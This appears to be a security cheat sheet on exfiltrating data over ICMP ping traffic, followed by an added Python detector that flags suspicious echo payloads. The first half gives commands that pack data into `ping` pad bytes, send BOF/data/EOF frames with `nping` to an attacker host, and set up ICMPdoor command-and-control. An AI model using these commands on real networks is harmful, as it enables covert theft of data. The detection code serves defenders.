# ICMP Exfiltration

* [ICMP Types](https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtm)
* Type 0 (Echo Reply) carries an optional data field after the fixed header; Type 8 (Echo Request) uses the same layout

```
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Identifier          |        Sequence Number        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
+                             Data                              +
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
```

## Usage

* The `-p` (pattern) parameter of `ping` can be used to fill the packet with chosen bytes. From the manual:

```
-p pattern
    You may specify up to 16 “pad” bytes to fill out the packet you send.
    This is useful for diagnosing data-dependent problems in a network.
    For example, -p ff will cause the sent packet to be filled with all ones.
```

* Send hex-encoded data as the pad pattern (at most 16 bytes per packet, per the manual)

```sh
ping $TARGET_IP -c 1 -p $(echo "data payload" | xxd -p)
```

### Metasploit ICMP Exfiltration

* Await ICMP data on the attacker machine

```sh
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp and not src $ATTACKER_IP
set INTERFACE <interface>
run
```

* Exfiltrate from the target via `ping` as shown above, or with `nping`
* Start the transmission with `nping`: a `BOF` message opens the transfer, the data follows, and `EOF` closes it

```sh
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "BOFpayload.txt"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "actual payload"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "EOF"
```

### C2 over ICMP

* Use [krabelize's ICMPdoor](https://github.com/krabelize/icmpdoor)
* On the target

```sh
sudo icmpdoor -i <interface> -d $ATTACKER_IP
```

* On the attacker

```sh
sudo icmp-cnc -i <interface> -d $TARGET_IP
```
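The following is an added example, not code from the page or from any of the tools it mentions. It decodes the header layout above (Type, Code, Checksum, Identifier, Sequence Number, then Data), verifies the RFC 1071 checksum, and then applies a few defender-side heuristics to the data field so that the `ping -p`, `nping` `BOF`/`EOF` and opaque-payload cases described on this page stand out from ordinary ping traffic. Assumptions: the benign filler patterns (the `0x10, 0x11, ...` byte ramp after an 8- or 16-byte timestamp that iputils `ping` sends, and the `abcdefghijklmnopqrstuvwabcdefghi` string that Windows `ping` sends) are from my own knowledge, the printable-ratio and entropy thresholds are chosen for illustration, and all sample packets are constructed inline.

```python
import math
import struct
from collections import Counter

# ICMP header from the layout above (RFC 792): Type, Code, Checksum, Identifier, Sequence Number.
ICMP_HEADER = struct.Struct("!BBHHH")
ECHO_REPLY, ECHO_REQUEST = 0, 8

# Default filler sent by Windows ping (assumed from observed captures): printable, but benign.
WINDOWS_PING_FILLER = b"abcdefghijklmnopqrstuvwabcdefghi"

R_BAD_CKSUM = "bad checksum"
R_TRIGGER = "metasploit icmp_exfil BOF/EOF trigger"
R_TEXT = "printable-text payload that is not a known ping filler"
R_ENTROPY = "high-entropy payload (possible compressed or encrypted data)"
R_NONDEFAULT = "payload does not match a known ping filler"


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum over the whole ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def parse_icmp(msg: bytes) -> dict:
    """Decode the header fields and verify the checksum; raises on a truncated message."""
    if len(msg) < ICMP_HEADER.size:
        raise ValueError("truncated ICMP message")
    icmp_type, code, checksum, ident, seq = ICMP_HEADER.unpack_from(msg)
    zeroed = msg[:2] + b"\x00\x00" + msg[4:]  # the checksum is computed with its own field zeroed
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq,
            "payload": msg[ICMP_HEADER.size:],
            "checksum_ok": icmp_checksum(zeroed) == checksum}


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Assemble an echo message with a correct checksum (used only to construct the samples below)."""
    header = ICMP_HEADER.pack(icmp_type, 0, 0, ident, seq)
    return ICMP_HEADER.pack(icmp_type, 0, icmp_checksum(header + payload), ident, seq) + payload


def entropy_bits_per_byte(data: bytes) -> float:
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def is_linux_ping_filler(payload: bytes) -> bool:
    """iputils ping (assumed layout): a timestamp of 8 or 16 bytes, depending on struct timeval,
    followed by the byte ramp 0x10, 0x11, ...; `-p` replaces that ramp, which is what the page uses."""
    return any(len(payload) > ts and all(payload[i] == i & 0xFF for i in range(ts, len(payload)))
               for ts in (8, 16))


def classify_echo(msg: bytes) -> list:
    """Reasons an echo message looks like a data channel; an empty list means it looks like plain ping."""
    pkt = parse_icmp(msg)
    if pkt["type"] not in (ECHO_REQUEST, ECHO_REPLY):
        return []  # only echo traffic is examined here
    reasons = [] if pkt["checksum_ok"] else [R_BAD_CKSUM]
    p = pkt["payload"]
    if not p or p == WINDOWS_PING_FILLER or is_linux_ping_filler(p):
        return reasons
    payload_reasons = []
    if p.startswith((b"BOF", b"EOF")):
        payload_reasons.append(R_TRIGGER)
    if sum(32 <= b < 127 for b in p) / len(p) > 0.9:
        payload_reasons.append(R_TEXT)
    if entropy_bits_per_byte(p) > 6.0:
        payload_reasons.append(R_ENTROPY)
    return reasons + (payload_reasons or [R_NONDEFAULT])


# Constructed samples. TIMESTAMP stands in for the 16-byte struct timeval a 64-bit iputils ping prepends.
TIMESTAMP = struct.pack("!QQ", 1700000000, 123456)
SAMPLES = {
    "linux_default": build_echo(ECHO_REQUEST, 0x1234, 1, TIMESTAMP + bytes(range(16, 56))),
    "windows_default": build_echo(ECHO_REQUEST, 1, 1, WINDOWS_PING_FILLER),
    # `ping -p` with the hex of "data payload\n": the pattern repeats after the timestamp
    "ping_pattern": build_echo(ECHO_REQUEST, 0x1234, 2, TIMESTAMP + (b"data payload\n" * 4)[:40]),
    # nping --data-string sends the string as the entire data field
    "nping_bof": build_echo(ECHO_REQUEST, 1, 1, b"BOFpayload.txt"),
    # a pseudo-random-looking 128-byte payload standing in for compressed or encrypted data
    "opaque": build_echo(ECHO_REPLY, 1, 1, bytes((i * 73 + 41) % 256 for i in range(128))),
}

if __name__ == "__main__":
    for name, msg in SAMPLES.items():
        print(f"{name:16s} {classify_echo(msg)}")
```

The filler checks are what keep this from alerting on every ping: a default Linux or Windows echo produces no reasons, while the `-p` pattern from the Usage section is reported only as a non-default payload (the 16-byte timestamp dilutes its printable ratio), the `BOFpayload.txt` framing is reported by both the trigger and the text heuristic, and an opaque payload is reported by entropy alone. A benign `ping -p ff` also trips the non-default check, so in practice that reason is a low-severity signal to be combined with volume or destination context rather than an alert by itself.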